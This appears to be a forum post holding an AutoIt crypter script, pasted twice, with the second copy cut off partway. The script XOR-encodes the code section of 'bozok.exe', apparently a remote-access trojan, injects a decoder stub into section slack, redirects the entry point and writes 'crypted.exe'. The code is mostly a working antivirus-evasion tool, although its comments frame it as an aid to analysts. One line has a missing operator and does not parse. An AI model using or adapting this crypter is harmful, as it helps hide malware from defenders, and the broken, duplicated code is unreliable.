[LENGUAJE=autoit] #include
; ##################################################################################################
; #### 1. Open a PE file in binary modus
; ##################################################################################################
; Overview: the script rewrites a 32-bit PE so that the bytes of its code section are stored
; XOR-ed with a fixed key and a small decoder stub placed in the section's slack runs first.
; The notes in each step describe exactly what is read and written, so the traces this leaves
; in a sample (writable code section, entry point in former slack, fixed stub bytes) can be
; recognised during analysis.
;
; The file is opened with mode 16 (binary), so $sBin holds a Binary value. Every string
; function below forces it to text: a hex dump of the file prefixed with "0x", two characters
; per byte. All "pointers" ($p...) in this script are therefore 1-based character positions
; in that hex text, not byte offsets into the file.
; Note: $sFile1 is a relative name and is resolved against the current working directory,
; which is not necessarily @ScriptDir as the error text suggests.
$sFile1 = "bozok.exe"
$hFileOpen1 = FileOpen ($sFile1,16)
$sBin = FileRead ($hFileOpen1)
If @error = True Then
beep()
MsgBox(0,"Error","File not found in script directory")
FileClose ($hFileOpen1)
Exit
EndIf
FileClose ($hFileOpen1)
ConsoleWrite(" + Read file done" & @CRLF)
;MsgBox(0,"Hex View:",$sBin)
; ##################################################################################################
; #### 2a. Get Autoit string pointer position of code section
; ##################################################################################################
; Plain substring search for the ASCII bytes "CODE" (first occurrence in the whole hex text).
; Only a section literally named CODE is handled; the error message refers to "text", which
; is not searched. The match is not verified to lie inside the section table.
$sCODE = "434F4445" ; "CODE"
$pStartPosition = 1
$pStringPointer_1 = StringInStr($sBin, $sCODE, 1, 1, $pStartPosition )
If $pStringPointer_1 = 0 Then
beep()
MsgBox(0,"Error", "File does not contain a named CODE section, try ""text" )
Exit
Else
ConsoleWrite(" + Found Autoit string poiter of ""CODE"" in FileHeader " &@CRLF)
EndIf
;MsgBox(0,"Autoit String Pointer:",$pStringPointer_1)
; ##################################################################################################
; #### 2b. Get values of FileHeader with string pointer position & addition
; ##################################################################################################
; PE Format:
;
; Each 4-byte field of the IMAGE_SECTION_HEADER is read as four 2-character groups with
; StringRegExp flag 2, so index 0 is the full 8-character match and 1..4 are the bytes in
; file order. Fields are little-endian; the reader swaps bytes within each 16-bit half:
; $s..._1 = low word, $s..._2 = high word, and "0x" & high & low is the full value as text.
; Section header layout (byte offsets): Name 0..7, VirtualSize 8, VirtualAddress 12,
; SizeOfRawData 16, PointerToRawData 20, Characteristics 36. In hex text every size doubles.
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szNamefield = 16 ; 8 bytes
$pVirtualSize = $pStringPointer_1 + $szNamefield
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
; Defined further down; AutoIt resolves Func definitions before the script body runs.
_VirtualSize()
; Reads the 4-byte VirtualSize field at $pVirtualSize from the global $sBin and publishes
; three globals: $sVZ_1 (low 16 bits, byte-swapped), $sVZ_2 (high 16 bits) and
; $hVirtualSize ("0x" plus the full 32-bit value as big-endian text). Called again in
; step 6 after the field has been patched, to re-read the new value. If the regex does
; not match, the globals are left untouched and no error is reported.
Func _VirtualSize()
$aVZ = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pVirtualSize)
If IsArray($aVZ) = True Then
;_ArrayDisplay($aVZ)
Global $sVZ_1 = $aVZ[2] & $aVZ[1] ; undo little-endian byte order within the low word
Global $sVZ_2 = $aVZ[4] & $aVZ[3]
Global $hVirtualSize = "0x" & $sVZ_2 & $sVZ_1
EndIf
EndFunc
ConsoleWrite(" + VirtualSize = " & $hVirtualSize & @CRLF)
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualSize = 8 ; 4 bytes or double word
; VirtualAddress (RVA at which the section is mapped); called "VirtualOffset" in this script.
$pVirtualOffset = $pVirtualSize + $szVirtualSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aVO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pVirtualOffset)
If IsArray($aVO) = True Then
;_ArrayDisplay($aVO)
$sVO_1 = $aVO[2] & $aVO[1]
$sVO_2 = $aVO[4] & $aVO[3]
$hVirtualOffset = "0x" & $sVO_2 & $sVO_1
ConsoleWrite(" + VirtualOffset = " & $hVirtualOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualOffset = 8
; SizeOfRawData (size of the section on disk).
$pRawSize = $pVirtualOffset + $szVirtualOffset
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRS = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawSize)
If IsArray($aRS) = True Then
;_ArrayDisplay($aRS)
$sRS_1 = $aRS[2] & $aRS[1]
$sRS_2 = $aRS[4] & $aRS[3]
$hRawSize = "0x" & $sRS_2 & $sRS_1
ConsoleWrite(" + RawSize = " & $hRawSize & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawSize = 8
; PointerToRawData (file offset of the section's first byte).
$pRawOffset = $pRawSize + $szRawSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawOffset)
If IsArray($aRO) = True Then
;_ArrayDisplay($aRO)
$sRO_1 = $aRO[2] & $aRO[1]
$sRO_2 = $aRO[4] & $aRO[3]
; Unlike the other $h... values this one is kept without the "0x" prefix, because it is
; fed straight into dec() in step 3.
$hRawOffset = $sRO_2 & $sRO_1
ConsoleWrite(" + RawOffset = 0x" & $hRawOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawOffset = 8
; Skips PointerToRelocations, PointerToLinenumbers, NumberOfRelocations and
; NumberOfLinenumbers (12 bytes = 24 hex characters) to land on Characteristics.
$12ByteFreeSpace = 24
$pCharacteristics = $pRawOffset + $szRawOffset + $12ByteFreeSpace
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aChar = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pCharacteristics)
If IsArray($aChar) = True Then
$sChar_1 = $aChar[2] & $aChar[1]
$sChar_2 = $aChar[4] & $aChar[3]
$Characteristics = "0x" & $sChar_2 & $sChar_1
ConsoleWrite(" + Read Characteristics = " & $Characteristics & @CRLF)
; NOTE(review): the comparison operator between $aChar[4] and "E0" is missing in this copy
; of the script (presumably lost when the post was extracted); the line does not parse as
; written. $aChar[4] is the most significant byte of Characteristics, and 0xE0 there is
; the IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE combination. A code
; section marked writable is a classic static indicator of self-modifying or packed binaries.
If $aChar[4] "E0" Then ; makes code section writeable
$sReplace = $aChar[1] & $aChar[2] & $aChar[3] & "E0"
;MsgBox(0,"test", $sReplace)
; Replaces the first occurrence of the 8-character pattern anywhere in the hex text
; (occurrence 1), which is assumed to be the header field just read.
$sNewBin = StringReplace ( $sBin, $aChar[0],$sReplace, 1 )
$sBin = $sNewBin
;$aView = StringRegExp($sNewBin , "(..)(..)(..)(..)", 1, $pCharacteristics)
;_ArrayDisplay($aView)
ConsoleWrite("+ Set writeable flag in code section done." & @CRLF)
EndIf
EndIf
; ##################################################################################################
; #### 3. Convert the found hex values from FileHeader to Autoit String Pointer
; ##################################################################################################
; + Get $pStartOfSection
; hex2dec
; Text position of file offset N is N*2 + 3: two characters for the leading "0x" of the
; stringified Binary value plus one for 1-based indexing.
$dRawOffset = dec($hRawOffset)
$pFix = $dRawOffset * 2
$pStartOfSection = $pFix + 3
;MsgBox(0,"$pStartOfSection", $pStartOfSection)
;$aView = StringRegExp($sBin, "(........)", 1, $pStartOfSection) ; 8 signs = 4 bytes
;_ArrayDisplay($aView)
; ==================================================================================================
; + Get $pEndOfSection
; From here on only the low 16-bit halves ($s..._1) are used, so sizes and offsets of
; 0x10000 and above are truncated. $dRawOffset is re-assigned here from the low word,
; whereas the line above used the full 32-bit value. $pEndOfSection itself is not used
; again in this script.
$dRawSize = dec($sRS_1)
$dRawOffset = dec($sRO_1)
$pFix = ($dRawSize*2) + ($dRawOffset*2)
$pEndOfSection = $pFix + 3
;MsgBox(0,"EndOfsection",$pEndOfSection )
;$View2 = StringRegExp($sBin, "(....)", 1, $pEndOfSection - 2) ; without -2 = next section start
;_ArrayDisplay($View2)
; ==================================================================================================
; + Get $pEndOfCode for XOR encode
; End of the bytes the section actually uses in memory (VirtualSize). When VirtualSize is
; smaller than SizeOfRawData the gap up to $pEndOfSection is the slack written to in step 5d.
$dVirtualSize = dec($sVZ_1)
$pFix2 = ($dVirtualSize*2) + ($dRawOffset*2)
$pEndOfCode = $pFix2 + 3
;MsgBox(0,"pEndOfCode",$pEndOfCode )
;$View3 = StringRegExp($sBin, "(....)", 1, $pEndOfCode - 2) ; without -2 = next section start
;_ArrayDisplay($View3)
; ##################################################################################################
; #### 4. XOR encoding
; ##################################################################################################
MsgBox(0,"XOR encoding","Start")
; Walks the section one byte (two hex characters) at a time and XORs each with $hKey in
; place via _XOR. The loop ends only on exact equality with $pEndOfCode; both positions
; have the form 2*N+3, so equality is reachable provided $pEndOfCode > $pStartOfSection.
; A single fixed-key byte XOR is trivially reversible, and the key is stored in clear in
; the stub built in step 5c.
$xCounter = $pStartOfSection
$hKey = 0xde
$hKeyb = "DE" ; the same key as text, used for the stub bytes in step 5c
; XOR code section
Do
_XOR($xCounter,$hKey)
$xCounter = $xCounter + 2
Until $xCounter = $pEndOfCode
MsgBox(0,"XOR encoding ","End")
ConsoleWrite("+ XOR encoding complete" & @CRLF)
; ##################################################################################################
; #### 5a. Get Autoit string pointer position of "PE" for Entrypoint and Imagebase
; ##################################################################################################
$sPE = "5045" ; "PE"
$pStartPosition = 1
; First occurrence of the bytes "PE", assumed to be the PE signature; the DOS header's
; e_lfanew field is not consulted.
$pStringPointer_2 = StringInStr($sBin, $sPE, 1, 1, $pStartPosition )
;MsgBox(0,"PE pointer",$pStringPointer_2 )
; ##################################################################################################
; #### 5b. Get Entrypoint and Imagebase values for the shellcode
; ##################################################################################################
; AddressOfEntryPoint lies 40 bytes (80 hex characters) past the signature: 4 signature
; bytes + 20-byte COFF file header + 16 bytes into the optional header.
$pEntryPoint = $pStringPointer_2 + 80
; Defined further down; AutoIt resolves Func definitions before the script body runs.
_Entrypoint()
; Reads the 4-byte AddressOfEntryPoint at $pEntryPoint from the global $sBin into the
; global $hEntryPoint ("0x" plus the 32-bit value as big-endian text). $sEP_1/$sEP_2 are
; not declared Global and appear to be function-local. Called again in step 6 after the
; field has been patched. No error is reported if the regex does not match.
Func _Entrypoint()
$aEP = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pEntryPoint)
;_ArrayDisplay($aEP)
If IsArray($aEP) = True Then
$sEP_1 = $aEP[2] & $aEP[1]
$sEP_2 = $aEP[4] & $aEP[3]
Global $hEntryPoint = "0x" & $sEP_2 & $sEP_1
;MsgBox(0,"EntryPoint",$hEntryPoint)
EndIf
EndFunc
; ImageBase sits 12 bytes (24 hex characters) after AddressOfEntryPoint in a PE32 optional
; header (BaseOfCode and BaseOfData lie in between); the PE32+ layout differs.
$pImageBase = $pEntryPoint + 24
$aIB = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pImageBase)
;_ArrayDisplay($aIB)
If IsArray($aIB) = True Then
$sIB_1 = $aIB[2] & $aIB[1]
$sIB_2 = $aIB[4] & $aIB[3]
$hImageBase = "0x" & $sIB_2 & $sIB_1
;MsgBox(0,"ImageBase",$hImageBase)
EndIf
; + Convert Autoit pEndOfCode to hexadecimal
; Back from text position to file offset ((p - 3) / 2), then to an RVA by adding
; VirtualAddress - PointerToRawData. Low 16-bit halves only, as in step 3.
$dVirtualOffset = dec($sVO_1)
$dRawOffset = dec($sRO_1)
$dEndOfCode = ($pEndOfCode - 3) / 2
$dEndOfCode = $dEndOfCode + $dVirtualOffset - $dRawOffset
$hEndOfCode = _Dec2Hex($dEndOfCode)
;MsgBox(0,"EndOfCode Pointer",$hEndOfCode & " hex or " & $dEndOfCode & " dez")
; and split it for XOR shellcode
; $EOC1 / $EOC2 = low / high byte of the 16-bit RVA, i.e. the value in little-endian order.
$EOC1 = StringRight ($hEndOfCode, 2)
$EOC2 = StringMid ($hEndOfCode, 1, 2)
;MsgBox(0, "", $EOC1 & " & " & $EOC2 )
; ##################################################################################################
; #### 5c. Create assembler shellcode with the needed values from Fileheader
; ##################################################################################################
; ASM codes
;
; B8 00104000 MOV EAX,00401000 ; Move start address to EAX
; 8030 DE XOR BYTE PTR DS:[EAX],0DE ; XOR one byte
; 40 INC EAX ; Increase Eax +1
; 3D A8644000 CMP EAX,004064A8 ; Compare start address (EAX) with end of address
; 72 F5 JB SHORT 004064AD ; If EAX != end address, jump back to xor (loop)
; EB CE JMP SHORT ModuleEntryPoint ; If EAX = end address,jump to original entrypoint
; Each 32-bit immediate is assembled little-endian from a 16-bit low half ($aVO[1] & $aVO[2]
; is VirtualAddress in file order; $EOC1 & $EOC2 is the end RVA) plus the upper two bytes of
; ImageBase ($aIB[3] & $aIB[4]). The stub therefore assumes the low word of ImageBase is
; zero and that both RVAs fit in 16 bits. The "72F5" and "EBCE" displacements are constants
; and are not derived from the header values. Apart from the two 16-bit operands and the key
; byte the stub is a fixed 18-byte sequence, which makes it a straightforward static
; signature for detection.
$cMOV_EAX_Start = "B8" & $aVO[1] & $aVO[2] & $aIB[3] & $aIB[4]
$cXOR_Key = "8030" & $hKeyb
$cINC_EAX = "40"
$cCMP_EAX_End = "3D" & $EOC1 & $EOC2 & $aIB[3] & $aIB[4]
$cJB = "72F5"
$cJMP = "EBCE"
$sASM_XORdecode = $cMOV_EAX_Start & $cXOR_Key & $cINC_EAX & $cCMP_EAX_End & $cJB & $cJMP
ConsoleWrite("+ Created shellcode = " & $sASM_XORdecode & @CRLF)
; ##################################################################################################
; #### 5d. Write shellcode into codevave
; ##################################################################################################
; Overwrites the 36 hex characters (18 bytes) at the old end-of-code position with the stub,
; using StringReplace in its start-position form. Nothing checks that the slack is large
; enough or unused; _ZeroCheck below exists for that purpose but is never called.
$sBin = StringReplace($sBin, $pEndOfCode, $sASM_XORdecode)
; ##################################################################################################
; #### 6. Fix new entrypoint and VirtualSize in FileHeader
; ##################################################################################################
; Fix Entrypoint
; Only the low 16 bits of AddressOfEntryPoint are overwritten (2 bytes at $pEntryPoint);
; the high word keeps its previous value. After this, the entry point lies in what used to
; be section slack, one of the header-level traces this leaves.
$iNewEntrypoint = $EOC1 & $EOC2
$sBin = StringReplace($sBin,$pEntryPoint,$iNewEntrypoint,1)
_Entrypoint() ; read again
ConsoleWrite("+ Set new Entrypoint in fileheader to " & $hEntryPoint &@CRLF)
; Shellcode size
$StringLen = StringLen($sASM_XORdecode)
$bLen = $StringLen / 2 ; get byte size
; VirtualSize
; Rebuilt without the "0x" prefix for dec(), then grown by the stub size so the loader maps
; the bytes written into the slack. Hex(..., 4) keeps only the low 16 bits, and only those
; two bytes are written back to the header.
$hVirtualSize = $sVZ_2 & $sVZ_1
$dVirtualSize = dec($hVirtualSize)
$dNewVirtualSize = $dVirtualSize + $bLen
$hNewVirtualSize = Hex(int($dNewVirtualSize),4)
; split
$hNVZ1 = StringRight ($hNewVirtualSize, 2)
$hNVZ2 = StringMid ($hNewVirtualSize, 1, 2)
$sIndiVirtualSize = $hNVZ1 & $hNVZ2
;MsgBox(0,"LitleIndian VirtualSize", $sIndiVirtualSize )
$sNewBin = StringReplace ( $sBin, $pVirtualSize ,$sIndiVirtualSize , 1 )
$sBin = $sNewBin
_VirtualSize()
ConsoleWrite("+ Set new VirtualSize in fileheader to " & $hVirtualSize & @CRLF )
; ##################################################################################################
; #### 7. Write new file on HDD
; ##################################################################################################
; Output always goes to crypted.exe next to the script (mode 2 = overwrite). binary() turns
; the hex text back into bytes. Each error is reported but does not stop the script.
$sNewName = @ScriptDir & "\crypted.exe"
$hFile2 = FileOpen($sNewName ,2)
If @error = True Then MsgBox(0,"Error","FileOpen") EndIf
FileWrite($hFile2, binary($sBin))
If @error = True Then MsgBox(0,"Error","FileWrite") EndIf
FileClose($hFile2)
If @error = True Then MsgBox(0,"Error","FileClose") EndIf
MsgBox(0,"File", "done!")
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
#region
; FUNCS
; Returns 1 if the byte two hex characters before text position $i in the global $sBin is
; 00, 0 if it is anything else, and nothing (the default return) if the regex finds no
; match. Not called anywhere in this script.
Func _ZeroCheck($i)
$i = $i - 2
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
If $aPointer[0] = "00" Then
return 1
Else
return 0
EndIf
EndIf
EndFunc
; XORs the single byte (two hex characters) at text position $i of the global $sBin with
; $hKey and writes the two uppercase result characters back in place, using StringReplace
; in its start-position form. AutoIt binds an undeclared assignment inside a Func to an
; existing Global of the same name, so the script-level $sBin is what gets updated.
; Silently does nothing if the regex finds no match at $i.
Func _XOR($i,$hKey)
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
$bHex = "0x" & $aPointer[0]
$dRet = BitXOR($bHex, $hKey)
$hRet = Hex(int($dRet),2)
$sBin = StringReplace ($sBin, $i,$hRet, -1 )
EndIf
EndFunc
; convert to hex
; Formats an integer as exactly four uppercase hex characters (16 bits; higher bits are
; dropped by Hex's length argument). The intermediate $Ret is not declared Local.
Func _Dec2Hex($iDezPosi)
local $iHex_Posi = Hex(int($iDezPosi),4 ) ; 4 = size
$Ret = $iHex_Posi
return $Ret
EndFunc
#endregion
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
[/LENGUAJE]
[LENGUAJE=autoit] #include
; ##################################################################################################
; #### 1. Open a PE file in binary modus
; ##################################################################################################
; Overview: the script rewrites a 32-bit PE so that the bytes of its code section are stored
; XOR-ed with a fixed key and a small decoder stub placed in the section's slack runs first.
; The notes in each step describe exactly what is read and written, so the traces this leaves
; in a sample (writable code section, entry point in former slack, fixed stub bytes) can be
; recognised during analysis.
;
; The file is opened with mode 16 (binary), so $sBin holds a Binary value. Every string
; function below forces it to text: a hex dump of the file prefixed with "0x", two characters
; per byte. All "pointers" ($p...) in this script are therefore 1-based character positions
; in that hex text, not byte offsets into the file.
; Note: $sFile1 is a relative name and is resolved against the current working directory,
; which is not necessarily @ScriptDir as the error text suggests.
$sFile1 = "bozok.exe"
$hFileOpen1 = FileOpen ($sFile1,16)
$sBin = FileRead ($hFileOpen1)
If @error = True Then
beep()
MsgBox(0,"Error","File not found in script directory")
FileClose ($hFileOpen1)
Exit
EndIf
FileClose ($hFileOpen1)
ConsoleWrite(" + Read file done" & @CRLF)
;MsgBox(0,"Hex View:",$sBin)
; ##################################################################################################
; #### 2a. Get Autoit string pointer position of code section
; ##################################################################################################
; Plain substring search for the ASCII bytes "CODE" (first occurrence in the whole hex text).
; Only a section literally named CODE is handled; the error message refers to "text", which
; is not searched. The match is not verified to lie inside the section table.
$sCODE = "434F4445" ; "CODE"
$pStartPosition = 1
$pStringPointer_1 = StringInStr($sBin, $sCODE, 1, 1, $pStartPosition )
If $pStringPointer_1 = 0 Then
beep()
MsgBox(0,"Error", "File does not contain a named CODE section, try ""text" )
Exit
Else
ConsoleWrite(" + Found Autoit string poiter of ""CODE"" in FileHeader " &@CRLF)
EndIf
;MsgBox(0,"Autoit String Pointer:",$pStringPointer_1)
; ##################################################################################################
; #### 2b. Get values of FileHeader with string pointer position & addition
; ##################################################################################################
; PE Format:
;
; Each 4-byte field of the IMAGE_SECTION_HEADER is read as four 2-character groups with
; StringRegExp flag 2, so index 0 is the full 8-character match and 1..4 are the bytes in
; file order. Fields are little-endian; the reader swaps bytes within each 16-bit half:
; $s..._1 = low word, $s..._2 = high word, and "0x" & high & low is the full value as text.
; Section header layout (byte offsets): Name 0..7, VirtualSize 8, VirtualAddress 12,
; SizeOfRawData 16, PointerToRawData 20, Characteristics 36. In hex text every size doubles.
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szNamefield = 16 ; 8 bytes
$pVirtualSize = $pStringPointer_1 + $szNamefield
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
; Defined further down; AutoIt resolves Func definitions before the script body runs.
_VirtualSize()
; Reads the 4-byte VirtualSize field at $pVirtualSize from the global $sBin and publishes
; three globals: $sVZ_1 (low 16 bits, byte-swapped), $sVZ_2 (high 16 bits) and
; $hVirtualSize ("0x" plus the full 32-bit value as big-endian text). Called again in
; step 6 after the field has been patched, to re-read the new value. If the regex does
; not match, the globals are left untouched and no error is reported.
Func _VirtualSize()
$aVZ = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pVirtualSize)
If IsArray($aVZ) = True Then
;_ArrayDisplay($aVZ)
Global $sVZ_1 = $aVZ[2] & $aVZ[1] ; undo little-endian byte order within the low word
Global $sVZ_2 = $aVZ[4] & $aVZ[3]
Global $hVirtualSize = "0x" & $sVZ_2 & $sVZ_1
EndIf
EndFunc
ConsoleWrite(" + VirtualSize = " & $hVirtualSize & @CRLF)
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualSize = 8 ; 4 bytes or double word
; VirtualAddress (RVA at which the section is mapped); called "VirtualOffset" in this script.
$pVirtualOffset = $pVirtualSize + $szVirtualSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aVO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pVirtualOffset)
If IsArray($aVO) = True Then
;_ArrayDisplay($aVO)
$sVO_1 = $aVO[2] & $aVO[1]
$sVO_2 = $aVO[4] & $aVO[3]
$hVirtualOffset = "0x" & $sVO_2 & $sVO_1
ConsoleWrite(" + VirtualOffset = " & $hVirtualOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualOffset = 8
; SizeOfRawData (size of the section on disk).
$pRawSize = $pVirtualOffset + $szVirtualOffset
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRS = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawSize)
If IsArray($aRS) = True Then
;_ArrayDisplay($aRS)
$sRS_1 = $aRS[2] & $aRS[1]
$sRS_2 = $aRS[4] & $aRS[3]
$hRawSize = "0x" & $sRS_2 & $sRS_1
ConsoleWrite(" + RawSize = " & $hRawSize & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawSize = 8
; PointerToRawData (file offset of the section's first byte).
$pRawOffset = $pRawSize + $szRawSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawOffset)
If IsArray($aRO) = True Then
;_ArrayDisplay($aRO)
$sRO_1 = $aRO[2] & $aRO[1]
$sRO_2 = $aRO[4] & $aRO[3]
; Unlike the other $h... values this one is kept without the "0x" prefix, because it is
; fed straight into dec() in step 3.
$hRawOffset = $sRO_2 & $sRO_1
ConsoleWrite(" + RawOffset = 0x" & $hRawOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawOffset = 8
; Skips PointerToRelocations, PointerToLinenumbers, NumberOfRelocations and
; NumberOfLinenumbers (12 bytes = 24 hex characters) to land on Characteristics.
$12ByteFreeSpace = 24
$pCharacteristics = $pRawOffset + $szRawOffset + $12ByteFreeSpace
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aChar = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pCharacteristics)
If IsArray($aChar) = True Then
$sChar_1 = $aChar[2] & $aChar[1]
$sChar_2 = $aChar[4] & $aChar[3]
$Characteristics = "0x" & $sChar_2 & $sChar_1
ConsoleWrite(" + Read Characteristics = " & $Characteristics & @CRLF)
; NOTE(review): the comparison operator between $aChar[4] and "E0" is missing in this copy
; of the script (presumably lost when the post was extracted); the line does not parse as
; written. $aChar[4] is the most significant byte of Characteristics, and 0xE0 there is
; the IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE combination. A code
; section marked writable is a classic static indicator of self-modifying or packed binaries.
If $aChar[4] "E0" Then ; makes code section writeable
$sReplace = $aChar[1] & $aChar[2] & $aChar[3] & "E0"
;MsgBox(0,"test", $sReplace)
; Replaces the first occurrence of the 8-character pattern anywhere in the hex text
; (occurrence 1), which is assumed to be the header field just read.
$sNewBin = StringReplace ( $sBin, $aChar[0],$sReplace, 1 )
$sBin = $sNewBin
;$aView = StringRegExp($sNewBin , "(..)(..)(..)(..)", 1, $pCharacteristics)
;_ArrayDisplay($aView)
ConsoleWrite("+ Set writeable flag in code section done." & @CRLF)
EndIf
EndIf
; ##################################################################################################
; #### 3. Convert the found hex values from FileHeader to Autoit String Pointer
; ##################################################################################################
; + Get $pStartOfSection
; hex2dec
; Text position of file offset N is N*2 + 3: two characters for the leading "0x" of the
; stringified Binary value plus one for 1-based indexing.
$dRawOffset = dec($hRawOffset)
$pFix = $dRawOffset * 2
$pStartOfSection = $pFix + 3
;MsgBox(0,"$pStartOfSection", $pStartOfSection)
;$aView = StringRegExp($sBin, "(........)", 1, $pStartOfSection) ; 8 signs = 4 bytes
;_ArrayDisplay($aView)
; ==================================================================================================
; + Get $pEndOfSection
; From here on only the low 16-bit halves ($s..._1) are used, so sizes and offsets of
; 0x10000 and above are truncated. $dRawOffset is re-assigned here from the low word,
; whereas the line above used the full 32-bit value. $pEndOfSection itself is not used
; again in this script.
$dRawSize = dec($sRS_1)
$dRawOffset = dec($sRO_1)
$pFix = ($dRawSize*2) + ($dRawOffset*2)
$pEndOfSection = $pFix + 3
;MsgBox(0,"EndOfsection",$pEndOfSection )
;$View2 = StringRegExp($sBin, "(....)", 1, $pEndOfSection - 2) ; without -2 = next section start
;_ArrayDisplay($View2)
; ==================================================================================================
; + Get $pEndOfCode for XOR encode
; End of the bytes the section actually uses in memory (VirtualSize). When VirtualSize is
; smaller than SizeOfRawData the gap up to $pEndOfSection is the slack written to in step 5d.
$dVirtualSize = dec($sVZ_1)
$pFix2 = ($dVirtualSize*2) + ($dRawOffset*2)
$pEndOfCode = $pFix2 + 3
;MsgBox(0,"pEndOfCode",$pEndOfCode )
;$View3 = StringRegExp($sBin, "(....)", 1, $pEndOfCode - 2) ; without -2 = next section start
;_ArrayDisplay($View3)
; ##################################################################################################
; #### 4. XOR encoding
; ##################################################################################################
MsgBox(0,"XOR encoding","Start")
; Walks the section one byte (two hex characters) at a time and XORs each with $hKey in
; place via _XOR. The loop ends only on exact equality with $pEndOfCode; both positions
; have the form 2*N+3, so equality is reachable provided $pEndOfCode > $pStartOfSection.
; A single fixed-key byte XOR is trivially reversible, and the key is stored in clear in
; the stub built in step 5c.
$xCounter = $pStartOfSection
$hKey = 0xde
$hKeyb = "DE" ; the same key as text, used for the stub bytes in step 5c
; XOR code section
Do
_XOR($xCounter,$hKey)
$xCounter = $xCounter + 2
Until $xCounter = $pEndOfCode
MsgBox(0,"XOR encoding ","End")
ConsoleWrite("+ XOR encoding complete" & @CRLF)
; ##################################################################################################
; #### 5a. Get Autoit string pointer position of "PE" for Entrypoint and Imagebase
; ##################################################################################################
$sPE = "5045" ; "PE"
$pStartPosition = 1
; First occurrence of the bytes "PE", assumed to be the PE signature; the DOS header's
; e_lfanew field is not consulted.
$pStringPointer_2 = StringInStr($sBin, $sPE, 1, 1, $pStartPosition )
;MsgBox(0,"PE pointer",$pStringPointer_2 )
; ##################################################################################################
; #### 5b. Get Entrypoint and Imagebase values for the shellcode
; ##################################################################################################
; AddressOfEntryPoint lies 40 bytes (80 hex characters) past the signature: 4 signature
; bytes + 20-byte COFF file header + 16 bytes into the optional header.
$pEntryPoint = $pStringPointer_2 + 80
; Defined further down; AutoIt resolves Func definitions before the script body runs.
_Entrypoint()
; Reads the 4-byte AddressOfEntryPoint at $pEntryPoint from the global $sBin into the
; global $hEntryPoint ("0x" plus the 32-bit value as big-endian text). $sEP_1/$sEP_2 are
; not declared Global and appear to be function-local. Called again in step 6 after the
; field has been patched. No error is reported if the regex does not match.
Func _Entrypoint()
$aEP = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pEntryPoint)
;_ArrayDisplay($aEP)
If IsArray($aEP) = True Then
$sEP_1 = $aEP[2] & $aEP[1]
$sEP_2 = $aEP[4] & $aEP[3]
Global $hEntryPoint = "0x" & $sEP_2 & $sEP_1
;MsgBox(0,"EntryPoint",$hEntryPoint)
EndIf
EndFunc
; ImageBase sits 12 bytes (24 hex characters) after AddressOfEntryPoint in a PE32 optional
; header (BaseOfCode and BaseOfData lie in between); the PE32+ layout differs.
$pImageBase = $pEntryPoint + 24
$aIB = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pImageBase)
;_ArrayDisplay($aIB)
